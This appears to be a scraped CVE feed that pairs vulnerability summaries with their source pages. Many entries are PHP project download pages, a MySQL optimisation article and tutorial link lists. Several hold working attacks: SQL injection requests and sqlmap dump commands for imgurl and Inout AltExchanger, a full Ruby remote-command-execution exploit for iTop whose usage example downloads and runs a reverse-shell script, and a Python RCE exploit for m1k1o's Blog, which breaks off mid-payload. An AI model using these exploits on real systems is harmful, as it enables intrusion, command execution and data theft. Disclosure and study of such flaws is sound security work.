imgurl v2.31 was discovered to contain a Blind SQL injection vulnerability via /upload/localhost.

**Description （漏洞描述）**

imgurl v2.31

Multiple ways are used to obtain user ip （使用了多种方法获取用户ip）

Then splice the user ip directly into the sql statement in lines 44 to 58 of upload.php（在upload.php的44到58行中，直接将ip拼接到了sql语句中）

query->uplimit($ip)

**Proof of Concept**

GET /upload/localhost HTTP/1.1
Host: host.local
Cookie: XSRF-TOKEN=\[Your\_XSRF-TOKEN\]; 
x-forwarded-for: ' union select case(2>1)when(1)then(10)else(0)end order by num desc-- 
Connection: close

Command for injection using sqlmap

python3 sqlmap.py -r http.txt --prefix="' union select case((1=1) and " --suffix=")when(1)then(10)else(0)end order by num desc-- " -level 3 -risk 3 --dbms sqlite -technique=B --text-only -T img\_options -D values --dump

**Repair method （修复方法）**

Check user ip format or use PDO to prevent sql injection （检查用户ip格式或使用PDO来防止sql注入）

CVE-2022-29305: Blind SQL Injection Vulnerability  · Issue #75 · helloxz/imgurl

By ghostadmin
SQL (structured query language) is a unique programming language for storing, manipulating, and retrieving data from a database.…
This is a post from HackRead.com Read the original post: How to Optimize Your Database Storage in MySQL

SQL (structured query language) is a unique programming language for storing, manipulating, and retrieving data from a database. The language is applied in multiple relational database systems, including Postgres, Oracle, MySQL, and SQL Server, among others. Using SQL statements, developers can handle functional database operations like updating, creating, and deleting data.

With increasing data and technology becoming complex, it is crucial now to optimize MySQL databases to lower your infrastructure costs and deliver the best end-user experience. By optimizing your database storage, professionals will quickly identify bottlenecks, eliminate guessing games, and target insufficient operations by reviewing query execution plans.

Below are a few ways of optimizing your database storage in MySQL.

**Profile the server workload**

To fully understand how your server works, you should first review its workload. This will reveal the most expensive and slowest queries so you can optimize them. Remember that your most important metric in MySQL is time because you want the completion of a query to be almost instant when issued against your server.

**Understand your crucial resources**

All databases rely on four crucial resources; CPU, memory, network, and disk. Overwhelming any of these resources will create an inconsistent and weak server that leads to performance lags and issues. It is crucial to choose high-performing resources from the get-go because no amount of optimization of MySQL will make up for bad hardware. When checking the performance of your four resources, distinguish whether they are performing slowly or simply overloaded. This allows you to rectify performance issues quickly.

**Use the STaaS model**

STaaS (storage as a service) denotes a business model where a service provider will rent you storage resources through a subscription. With this alternative, you only pay for the storage you need when needed. This is an inexpensive option because it negates the capital expenses for new storage equipment and allows upgrading your storage according to your needs. Some of the major cloud storage providers using the STaaS model are Microsoft Azure, Oracle Cloud, Google Cloud, and Amazon Web Services.

**Do not use MySQL as your queue**

Your applications can be infiltrated by queues and access patterns looking like queues without you noticing. For instance, when you establish a status during web development, you might have accidentally created a queue.

A common instance of creating queues is when you mark emails as unsent, then send them and mark them as sent. Queues will keep tasks from running in parallel since workloads are serialized, and they generate tables detailing work in progress. Both issues will slow down your MySQL.

**Index all columns in ‘group by,’ ‘where,’ and ‘order by’ clauses**

Other than guaranteeing distinct, identifiable records, an index on MySQL allows the server to get faster results from a database. It is crucial when you want to sort your records. In some cases, an index on MySQL takes up a lot of space and might reduce performance on updates, deletes, and inserts. Nonetheless, when you have tables with more than ten rows, an index can reduce the execution time of your query.

When you know what dictates the performance of your database, you can reduce your costs and avoid overprovisioning. Hopefully, you have gathered a few facts on how MySQL works and how best to optimize it from the above article. Though it can be challenging, you can use phpMyAdmin to ease your database’s optimization. This is a free software tool that handles the web-based administration of MySQL.

Remember that optimization is iterative. With data growth and changes in workloads, new optimization opportunities will arise, so it is best to always be prepared for database optimization.

**More SQL and Database Topics**

1.  How to repair suspect database in SQL Server
2.  Whitehat hacker bypasses SQL injection filter for Cloudflare
3.  Hackers mining Monero on Microsoft SQL databases for the last 2 years
4.  US and China Exposed Most Databases Among 308,000 Discovered in 2021
5.  SQL Injection Allowed Hacker to Steal Data of 237,000 Users from Adult Site

How to Optimize Your Database Storage in MySQL

In Simple Food Website 1.0, a moderation can put the Cross Site Scripting Payload in any of the fields on http://127.0.0.1:1234/food/admin/all_users.php like Full Username, etc .This causes stored xss.

Submitted by ayoyemi on Thursday, April 1, 2021 - 00:22.

This is a simple **PHP Project** entitle **Simple Food Website**. This project was developed using **PHP** and **MySQL databases**. This system is a sort of **CMS (Content Management System)** in which the system or company management can provide their clients a simple website to know more about them. This system can be helpful to the IT/CS students or newbies to understand how to create a CMS Web App using PHP Language. The website containing an **About, Innovation**, and **Our Market Contents**. Since this project is a sort of **CMS** type of **web app**, the contents in the website can be managed or modified through the front-end in the admin panel or admin side/module of the project. This project also allows the admin to modify the site settings which are the site name, meta keywords, and meta description that can help your website improve its visibility for relevant searches in search Engines, in short, managing the website's basic information for **(SEO)**.

The system was developed using **PHP/PDO**, **MySQL Database**, **HTML**, **CSS**, **Javascript**, and **Bootstrap** for the design. The system has a pleasant user interface and user-friendly functionalities.

****Features****

**Website**

*   **Home Page**
*   **About Us Page/Content**
*   **Innovation Page/Content**
*   **Our Market Page/Content**
*   **Pleasant user interface**
*   **Contact Us Page**
*   **Footer containing system's other info and navigation**

**Admin Panel**

*   **Login Page**
*   **Manage Pages Contents**
*   **Manage System Information and Details**
*   **Manage User Accounts**

****How to Run****

**Requirements**

*   **Download** and **Install** any **local web server such as XAMPP/WAMP**.
*   **Download** the provided source code **zip** file. (_download button is located below._)

**Setup/Installation**

1.  **Extract** the downloaded source code **zip** file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start the **"Apache"** and **"MySQL"**.
3.  If you are using **XAMPP**, **copy** the extracted source code folder and paste it into the XAMPP's **"htdocs"** folder. And if you are using **WAMP**, paste it into the **"www"** folder.
4.  **Open** a new tab in your **browser** and browse the **PHPMyAdmin**. i.e. http://localhost/phpmyadmin
5.  **Create** a **new database** naming **"food"**.
6.  **Import** the provided **SQL** file in your newly created database. The file is known as **"INSTALL ME.sql"** and located inside the **"INSTALLER"** folder.
7.  **Open** a new tab in your **browser** and **browse** the **Web Application**. i.e. http://localhost/food for the website and http://localhost/food/admin for the admin side

****Admin Credentials****

Username: **admin**  
Password: **admin**

****DEMO****

That's it! I hope this **Simple Food Website** a **CMS Project** in **PHP** and **MySQL Database** will help you with what you are looking for and enhance your programming capabilities and knowledge.

**Thanks for downloading this software!**

Please don't forget to like us on www.facebook.com/hillsoftsnetwork

Check out my network www.lykup.com

You can contact me @  
WhatsApp number: +2348138652645  
Email: \[email protected\]  
Facebook account: www.facebook.com/faithyemi

_**GET CHEAPEST PROJECTS from $10**_

_MLM multilevel, Business directory, Crypto investment platform, school management system, hospital management system, music portal, POS, Blog/Magazine, Dating site, Charity donation platform, Exam system, Advertising website (like adtall.com), real estate listing, Car listing and a whole lot more._

*   5495 views

CVE-2022-30015: Simple Food Website (CMS) in PHP with Source Code

Inout Blockchain AltExchanger 1.2.1 allows index.php/home/about inoutio_language cookie SQL injection.

**Information**

    Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchanger
    Product             : Inout Blockchain AltExchanger
    version             : 1.2.1
    Date                : 2022-05-21
    Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
    Exploit Detail      : https://github.com/bigb0x/CVEs/Blockchain-AltExchanger-121-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**1- Vulnerable Parameter: symbol (GET)**

Vulnerability File: /application/third\_party/Chart/TradingView/chart\_content/master.php

  
**Sqlmap command:**

python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db  

**output:**

\` Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO
    

\[16:43:22\] \[INFO\] testing MySQL \[16:43:23\] \[INFO\] confirming MySQL \[16:43:26\] \[INFO\] the back-end DBMS is MySQL \[16:43:26\] \[INFO\] fetching banner \[16:43:26\] \[INFO\] resumed: 5.6.50 web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' \[16:43:26\] \[INFO\] fetching current database \[16:43:26\] \[INFO\] retrieved: inout\_blockchain\_altexchanger\_db current database: 'inout\_blockchain\_altexchanger\_db' \`  
  

**2- Vulnerable Parameter: marketcurrency (POST)**

Vulnerability File: /index.php/coins/update\_marketboxslider

  
**HTTP Request:**

**POST /index.php/coins/update_marketboxslider HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://vulnerable-host.com/ Cookie: inoutio_language=4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: vulnerable-host.com Connection: Keep-alive displaylimit=4&marketcurrency=-INJEQT-SQL-HERE**  
**3- Vulnerable Parameter: Cookie: inoutio\_language (GET)**

Vulnerability File: /index.php

  
**HTTP Request:**

**GET /index.php/home/about HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 x-requested-with: XMLHttpRequest Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: vulnerable-host.com Connection: Keep-alive**  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-21: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed@gmail.com

CVE-2022-31489: CVEs/Blockchain-AltExchanger-121-sqli.md at main · bigb0x/CVEs

Rescue Dispatch Management System 1.0 suffers from Stored XSS, leading to admin account takeover via cookie stealing.

Submitted by oretnom23 on Tuesday, April 26, 2022 - 16:07.

****Introduction****

This simple project is a **Rescue Dispatch Management System**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project provides an automated platform for managing the availability of the rescue responders team and recording the incident report efficiently and effectively. This was developed with a pleasant user interface using **Bootstrap Framework** and **AdminLTE Template**. It also consists of user-friendly features and functionalities.

****About the Rescue Dispatch Management System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **Rescue Dispatch Management System** can be only accessed by the dispatchers or the rescue management. The system stores the list of types of incidents, types of responders team, and incidents reported. The system users are incharge of assigning responders to the location of the reported incident. The dispatcher can only assign the available team. This system also generates printable reports of Daily Incident Report and Daily Incident Report per Type. The application is easy to manage and consists of a front-end feature for managing the system information such as the system name, logo, etc. The system can be accessed by 2 types of user roles which are the Administrator and Staff. The administrator has the privilege to access and manage all the features and functionalities of the system while the staff have only limited permission.

****Features****

*   **Home Page**
    *   Display the summary and images.
*   **Incident Type Management**
    *   Add New Incident Type
    *   List All Incident Types
    *   View Incident Type Details
    *   Delete Incident Type
*   **Respondent Type Management**
    *   Add New Respondent Type
    *   List All Respondent Types
    *   View Respondent Type Details
    *   Update Respondent Type Details
    *   Delete Respondent Type
*   **Team Management**
    *   Add New Team
    *   List All Teams
    *   View Team Details
    *   Update Team Details
    *   Delete Team
*   **Incident Management**
    *   Add New Incident
    *   List All Incidents
    *   View Incident Details
    *   Update Incident Details
    *   Delete Incident
*   **Report**
    *   Generate Printable Daily Incident Report
    *   Generate Printable Daily Incident Report per Type
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Login Page****

****Dashboard Page****

****Incident Report Form****

****Incident Report Details****

****Daily Incident Report Print View****

****Daily Incident Report per Type - Print View****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project plugins at https://www.dropbox.com/s/0makc07ent9ta4m/rdms\_plugins.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded plugins **zip** file**.
6.  **Copy** the extracted plugins folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****rdms\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****rdms\_db.sql**** located inside the **database** folder.
10.  **Browse** the **Rescue Dispatch Management System** in a **browser**. i.e. ****http://localhost/rdms/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Rescue Dispatch Management System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   878 views

CVE-2022-30017: Rescue Dispatch Management System in PHP/OOP Free Source Code

Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.

**PHP Data Objects (PDO)**

*   PDO – PHP database extension
*   How to use PDO to insert data into the database?
*   How to use PDO to read data from the database?
*   How to use PDO to update the database?
*   How to delete records?
*   PHP CRUD Operation using PDO Extension
*   Signup and Login operation using PDO
*   Password Hashing in PHP using PDO

**PHP OOP Concepts**

*   Basics Of OOPs in PHP
*   How to create classes and objects?
*   The $this keyword
*   Chaining methods and properties
*   Access modifiers: public vs. private
*   Magic Methods
*   The \_\_construct() magic method
*   Inheritance in PHP
*   Multilevel and Multiple inheritances in PHP

**CodeIgniter**

*   CI Introduction
*   CI Directory Structure
*   CI Controllers
*   CI Model
*   CI View
*   CI Libraries
*   CI Helpers
*   CI Plugins
*   How to create form in CI

**HTML**

*   HTML Introduction
*   HTML Useful Tags
*   HTML Text Formats
*   HTML Links
*   HTML Images
*   HTML Lists
*   HTML Forms
*   HTML Table
*   Content Style in HTML

**MySQL**

*   MySQL Introduction
*   MySQL Command-line
*   MySQL GUI Tools
*   MySQL Users
*   MySQL PHP Connections
*   MySQLi Procedural Functions
*   MySQL Data Type
*   MySQL Database and Tables
*   MySQL Column Modifiers

**Interview QAs**

*   PHP Interview Questions and Answers for Fresher
*   Basic PHP Programs
*   PHP Programming/ Logical Interview questions and answers
*   WordPress Interview Questions and Answers
*   MySQL Interview Question and Answers
*   Common SQL Interview Questions and Answers
*   CodeIgniter Interview Questions and Answers

**WordPress**

*   What is wordpress?
*   WordPress.com vs. WordPress.org
*   WordPress Installation
*   Logging Into Your New WordPress Site
*   WordPress Directory and File Structure
*   WordPress DB Structure & Schema

**PHP with Mysqli**

*   How to Connect PHP with MySQL Database
*   How to insert data into MySql using PHP
*   How to fetch data from MySQL using PHP
*   CRUD operation using PHP and MySQLi
*   User Signup and Sign in using HTML and PHP
*   How to change Password in PHP
*   User login and login tracking using PHP
*   How to check Email and username availability live using jquery/ajax
*   jQuery Dependent DropDown List – States and Districts
*   How to Send Mail Using PHP
*   PHP Email Verification Script
*   How to fetch data in excel or generate excel file in PHP
*   How to prevent Cross-Site Request Forgery (CSRF) in PHP
*   User registration with server-side validation using PHP
*   How to create a Shopping Cart in PHP
*   How to delete multiple records in PHP
*   PHP login with remember me function
*   How to create pagination in PHP
*   How to Create pagination using PHP and MySQLi(with the page number)
*   How to Dynamically Add / Remove input fields in PHP with Jquery Ajax
*   How to send email from localhost using PHP
*   How to use multiple insert queries in PHP
*   CRUD operation with Image Using PHP and MySQLi

**Other PHP Tutorials**

*   Time Ago Script in PHP
*   Get City Country By IP Address in PHP
*   Hit counter in PHP
*   Captcha Image Verification in PHP
*   Server Side form Validation in PHP
*   Date And Time Formatting With PHP
*   How to get Current Indian time in PHP
*   How to get Browser Information In PHP
*   How to convert number to String in PHP
*   How to get current page URL in PHP
*   How to get yesterday and tomorrow date in PHP
*   How to change date format in PHP

As technology keeps updating itself… so do we need to. Advancement in technology is the key to innovation through which you enjoy things you couldn’t a decade ago. Similarly, any Programming language basics keep on updating; it is essential for you to also get trained on all the latest features and the basics while learning a programming language.

PHPGurukul provides you with **PHP Latest tutorials** such as PHP CRUD operations using Procedure or MySQL group, and we keep on adding the latest functionalities tutorials to our website. Apart from these tutorials, we offer some great and usual benefits which will help you in your PHP career, and those are below:

*   You can easily get **PHP Projects Idea** through our website, which you would require when you learn PHP and want to try out something on your own. It all starts with an idea, of course.
*   Our website provides **PHP Tutorials for Students,** and you can also purchase Project reports from PHP gurukul for your submissions in college/universities.
*   Any programming language is tough to learn, but it becomes easier and fun to learn when you start with the basics. Our **PHP Tutorials for beginners** help you to learn from the basics till you learn the advanced concepts of PHP.
*   When you are doing web development apart from scripting languages like HTML, JavaScript, you should also know **PHP oops Concepts,** which are well explained in our tutorials to help you excel in PHP.

PHPGurukul also offers **PHP Projects** available for download in a few and easy steps that you can use directly or can customize as per your needs as PHP is an open-source scripting language. You can opt for free PHP Projects or go for our special Paid PHP Projects with additional features that are good for learning and professional usage.

You can enjoy the tutorials with special advanced concepts, go through Interview Q&A, or download the required PHP Projects with Project reports within no time using our website.

CVE-2022-29004: PHP Project, PHP Projects Ideas, PHP Latest tutorials, PHP oops Concept

Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.

**Project Name**

Online Birth Certificate System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Last Updated**

09 December 2021

In Online Birth Certificate System we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Home**:  In this section, admin can briefly view the total number of the new applications, total verified application and total rejected the application.

**2\. Birth Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search application with the help of customer  application

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Home Page**: In this section, user can view the welcome page of the web application.

**2.Birth Reg Form**: In this section, user can fill the form of birth certificate and see the status of his/her application.

**3.Certificate:** In this section, user can take print of verified certificates.

Users can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Birth Certificate From**

**Admin Dashboard**

**Birth Certificate  
  
**

How to run the online Birth Certificate System Project

1.Download the zip file

2.Extract the file and copy obcs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name obcsdb

6.Import obcsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/obcs

Admin Credential  
Username: admin  
Password: Test@123

User Credential  
Username: 9632123698  
Password: Test@12345

**View Demo** ——————————————————-

**Download full source code (Online Birth Certificate System)**

**Size: 12.1 MB**

**Version: V 1.2**

**Online Birth Certificate System Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-29005: Online Birth Certificate System Project Using PHP and MySQ -PhpGurukul

iTop versions prior to 2.7.5 authenticated remote command execution exploit.

#!/usr/bin/env ruby# Exploit## Title: iTop < 2.7.6 - (Authenticated) Remote command execution## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)## Author website: https://pwn.by/noraj/## Exploit source: https://github.com/Acceis/exploit-CVE-2022-24780## Date: 2022-05-20## Vendor Homepage: https://www.combodo.com/itop## Software Link: https://github.com/Combodo/iTop/archive/refs/tags/2.7.5.tar.gz## Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28)# Vulnerability## Discoverer: Markus KRELL## Date: 2021-10-04## Discoverer website: https://markus-krell.de/## Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312## Title: Server-Side Template Injection inside customer Portal## CVE: CVE-2022-24780## CWE: CWE-94, CWE-1336## Patch:##   - https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b##   - https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305##   - https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3## References:##   - https://nvd.nist.gov/vuln/detail/CVE-2022-24780##   - https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54##   - https://markus-krell.de/itop-template-injection-inside-customer-portal/require 'httpx'require 'docopt'require 'nokogiri'doc = <<~DOCOPT  iTop < 2.7.6 - (Authenticated) Remote command execution  Usage:    #{__FILE__} full <url> <username> <password> <cmd> [--debug]    #{__FILE__} light <url> <username> <password> <cmd> [--debug]    #{__FILE__} -h | --help    full: exploit with an emulated browser, execute JavaScript, preserve original user profile information    light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function  Options:    <url>       Root URL (base path) including HTTP scheme, port and root folder    <username>  iTop portal username    <password>  iTop portal user password    <cmd>       Command to execute on the target    --debug     Display arguments    -h, --help  Show this screen  Examples:    #{__FILE__} full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt'    #{__FILE__} light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl'DOCOPTdef login(root_url, user, pass, http)  login_url = "#{root_url}/pages/UI.php"  params = {    'auth_user' => user,    'auth_pwd' => pass,    'login_mode' => 'form',    'loginop' => 'login'  }  http.post(login_url, form: params).body.to_senddef login_watir(root_url, user, pass, browser)  login_url = "#{root_url}/pages/UI.php"  browser.goto login_url  browser.text_field(id: 'user').set(user)  browser.text_field(id: 'pwd').set(pass)  browser.button(value: 'Enter iTop').clickenddef fetch_form(root_url, http)  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  # Fetch and parse HTML document  doc = Nokogiri.HTML5(http.get(profile_url).body.to_s)  action = doc.css('form').first['action']  transaction_id = doc.css('input[name="transaction_id"]').first['value']  form_id = doc.css('form').first['id']  # doesn't work because it's populated with javascript, we'll need watir for that  #phone = doc.css('input[id^=field_phone]').first['value']  #location = doc.css('select[id^=field_location_id] option[selected]').first['value']  #function = doc.css('input[id^=field_function]').first['value']  return {action: action, tid: transaction_id, fid: form_id}enddef exploit(root_url, cmd, http, browser)  form_data = fetch_form(root_url, http)  vuln_url = "#{root_url}#{form_data[:action]}"  user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser)  params = {    'operation' => 'submit',    'stimulus_code' => '',    'transaction_id' => form_data[:tid],    # source data already escapes backslashes and double quotes for JSON    # so \ -> \\ and " -> \"    # but we need to esacpe backslash once for Ruby too because we need an interpolated string    # so \ -> \\ -> \\\\ and " -> \\"    'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager',    'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^,    'current_values[phone]' => user_info[:phone],    'current_values[location_id]' => user_info[:location],    'current_values[function]' => user_info[:function]  }  http.post(vuln_url, form: params).body.to_senddef fetch_form_js(root_url, browser)  # those values can't be fetched with nokogiri alone sicne they are populated using javascript  profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal"  browser.goto profile_url  phone = browser.text_field(name: 'phone').value  location = browser.select(name: 'location_id').selected_options.first.value  function = browser.text_field(name: 'function').value  return {phone: phone, location: location, function: function}endbegin  args = Docopt.docopt(doc)  pp args if args['--debug']  http = HTTPX.plugin(:cookies)  login(args['<url>'], args['<username>'], args['<password>'], http)  if args['full']    require 'watir'    require 'webdrivers'    b = Watir::Browser.new :firefox    login_watir(args['<url>'], args['<username>'], args['<password>'], b)  elsif args['light']    b = nil  end  exploit(args['<url>'], args['<cmd>'], http, b)rescue Docopt::Exit => e  puts e.messageend

iTop Remote Command Execution

m1k1o's Blog versions 1.3 and below suffer from an authenticated remote code execution vulnerability.

    # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-01-06# Exploit Author: Malte V# Vendor Homepage: https://github.com/m1k1o/blog# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip# Version: 1.3 and below# Tested on: Linux# CVE : CVE-2022-23626import argparseimport jsonimport refrom base64 import b64encodeimport requests as reqfrom bs4 import BeautifulSoupparser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',                    required=False)parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,                    required=False)parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,                    required=False)parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)args = vars(parser.parse_args())username = args['username']password = args['password']lhost_ip = args['ip']lhost_port = args['lport']address = args['url']port = args['port']url = f"http://{address}:{port}"blog_cookie = ""csrf_token = ""exploit_file_name = ""header = {    "Host": f"{address}",    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",    "X-Requested-With": "XMLHttpRequest",    "Csrf-Token": f"{csrf_token}",    "Cookie": f"PHPSESSID={blog_cookie}"}def get_cookie(complete_url):    global blog_cookie    cookie_header = {}    if not blog_cookie:        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"    result = req.get(url=complete_url, headers=cookie_header)    if result.status_code == 200:        blog_cookie = result.cookies.get_dict()['PHPSESSID']        print(f'[+] Found PHPSESSID: {blog_cookie}')        grep_csrf(result)def grep_csrf(result):    global csrf_token    csrf_regex = r"[a-f0-9]{10}"    soup = BeautifulSoup(result.text, 'html.parser')    script_tag = str(soup.findAll('script')[1].contents[0])    csrf_token = re.search(csrf_regex, script_tag).group(0)    print(f'[+] Found CSRF-Token: {csrf_token}')def login(username, password):    get_cookie(url)    login_url = f"{url}/ajax.php"    login_data = f"action=login&nick={username}&pass={password}"    login_header = {        "Host": f"{address}",        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    result = req.post(url=login_url, headers=login_header, data=login_data)    soup = BeautifulSoup(result.text, 'html.parser')    login_content = json.loads(soup.text)    if login_content.get('logged_in'):        print('[*] Successful login')    else:        print('[!] Bad login')def set_cookie(result):    global blog_cookie    blog_cookie = result.cookies.get_dict()['PHPSESSID']def generate_payload(command):    return f"""-----------------------------13148889121752486353560141292Content-Disposition: form-data; 